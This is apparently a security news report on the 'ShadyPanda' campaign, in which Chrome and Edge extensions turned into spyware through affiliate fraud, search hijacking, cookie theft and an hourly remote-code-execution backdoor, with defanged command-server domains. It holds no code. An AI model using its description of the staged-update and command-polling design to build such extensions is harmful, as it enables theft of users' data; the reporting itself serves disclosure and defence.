The long-running malicious operation known as “ShadyPanda” has successfully amassed over 4.3 million installations of browser extensions for Chrome and Edge. Discovered by Koi Security, this operation unfolded through distinct phases where initially legitimate-appearing browser extensions progressively received updates introducing increasingly severe malicious functions, effectively turning them into sophisticated spyware. The campaign encompasses 145 unique extensions—20 on Chrome and 125 on Edge—dating back to 2018. Although Google has since removed all related extensions from the Chrome Web Store, the campaign’s extensions remain active on the Microsoft Edge Add-ons platform, including one extension alone that is currently listed with an astonishing three million installs.
Although the initial submissions for some ShadyPanda extensions occurred as early as 2018, the first indications of malicious activity were not observed until 2023, primarily involving a group of extensions disguised as wallpaper and productivity tools. According to researchers at Koi, these early versions were primarily focused on affiliate fraud; they achieved this by injecting tracking codes from major platforms such as eBay, Amazon, and Booking.com into legitimate user links to siphon revenue from purchases made by the user base. This marks the initial malicious monetization step of the campaign, using the installed user base for passive financial gain.
The operation escalated significantly in early 2024 with the introduction of search hijacking, a clear sign that the ShadyPanda operators were becoming more aggressive in their activities. For instance, an extension named Infinity V+ was observed redirecting users’ search queries to the trovi[.]com domain. In addition to this hijacking, the same component was found to be exfiltrating users’ valuable cookie data to dergoodting[.]com and sending their search queries to various gotocdn subdomains, indicating a move toward direct data theft and more pervasive user manipulation.
The most severe phase occurred later in 2024, when five extensions, including three that had been running innocuously since their 2018 and 2019 uploads and had built up a legitimate reputation, were modified through a malicious update to include a full “backdoor.” This powerful payload grants the operators the capability to perform remote code execution on the user’s browser. Koi Security detailed the backdoor’s function: “Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access,” confirming its role not as fixed-function malware, but as a flexible command-and-control framework.
This backdoor functionality is used to continuously exfiltrate sensitive data, including browsing URLs, unique fingerprinting information, and persistent identifiers, all sent securely using AES encryption to the api[.]cleanmasters[.]store endpoint. A highly successful example from this set was the Clean Master extension on the Google Chrome Store, which had accumulated 200,000 installations before it was detected and flagged as malicious. In total, the group of extensions deployed with this particularly dangerous payload had already reached a combined install count of 300,000 at the time of discovery.
Reference:
